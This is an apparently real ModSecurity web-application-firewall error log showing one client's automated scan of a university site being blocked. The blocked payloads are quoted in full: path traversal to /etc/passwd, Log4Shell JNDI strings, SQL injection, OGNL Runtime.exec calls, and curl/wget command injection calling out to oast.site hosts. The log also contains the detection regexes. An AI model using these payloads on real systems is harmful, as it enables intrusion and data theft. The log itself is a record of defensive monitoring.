[Tue Aug 29 11:30:51.338719 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPpWfQAAAAI"]
[Tue Aug 29 11:30:51.397536 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg71zokjsjgnhss.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAOM4Z0AAAAU"]
[Tue Aug 29 11:30:52.361322 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOM4Z8AAAAU"]
[Tue Aug 29 11:30:52.393568 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPOhb4AAAAa"]
[Tue Aug 29 11:30:53.323154 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPDn1gAAAAP"]
[Tue Aug 29 11:30:53.560983 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAO8790AAAAF"]
[Tue Aug 29 11:30:54.389805 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPMmEMAAAAY"]
[Tue Aug 29 11:30:54.465386 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAOM4awAAAAU"]
[Tue Aug 29 11:30:54.509455 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAPRNdwAAAAf"]
[Tue Aug 29 11:30:55.407150 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAN@5BAAAAAO"]
[Tue Aug 29 11:30:56.339652 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAP05HQAAAAA"]
[Tue Aug 29 11:30:56.351107 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPPSzgAAAAd"]
[Tue Aug 29 11:30:58.380217 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPDn3EAAAAP"]
[Tue Aug 29 11:30:58.543420 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAN@5CIAAAAO"]
[Tue Aug 29 11:30:59.311349 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPxBW0AAAAS"]
[Tue Aug 29 11:30:59.383770 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgrxwsj4jfamqo4.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPRNe4AAAAf"]
[Tue Aug 29 11:31:03.474656 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10h8Co-f0AAAP5mGYAAAAM"]
[Tue Aug 29 11:31:03.517259 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgmqno5recce9e5.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H84AAAAI"]
[Tue Aug 29 11:31:04.706718 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgzm3xb6m6i9s4m.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgzm3xb6m6i9s4m.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAQA-6AAAAAi"]
[Tue Aug 29 11:31:04.724315 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgfsz34eo19on6a.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP7dXkAAAAR"]
[Tue Aug 29 11:31:05.001393 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAQA-6UAAAAi"]
[Tue Aug 29 11:31:05.738735 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "digilibfkip.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQQyiUAAAAy"]
[Tue Aug 29 11:31:06.316420 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQKOZkAAAAs"]
[Tue Aug 29 11:31:06.390914 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAP9HgQAAAAW"]
[Tue Aug 29 11:31:07.314539 2023] [:error] [pid 1030] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlg5zo94s3ahki5s.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQGld0AAAAo"]
[Tue Aug 29 11:31:08.313035 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAPDn4AAAAAP"]
[Tue Aug 29 11:31:09.088239 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgudiiznymph4j8.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAP4H@wAAAAI"]
[Tue Aug 29 11:31:10.325160 2023] [:error] [pid 900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlg5zakmsowigt8s.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAOE1ksAAAAC"]
[Tue Aug 29 11:31:10.337689 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQUH9cAAAA2"]
[Tue Aug 29 11:31:10.345564 2023] [:error] [pid 900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAOE1kwAAAAC"]
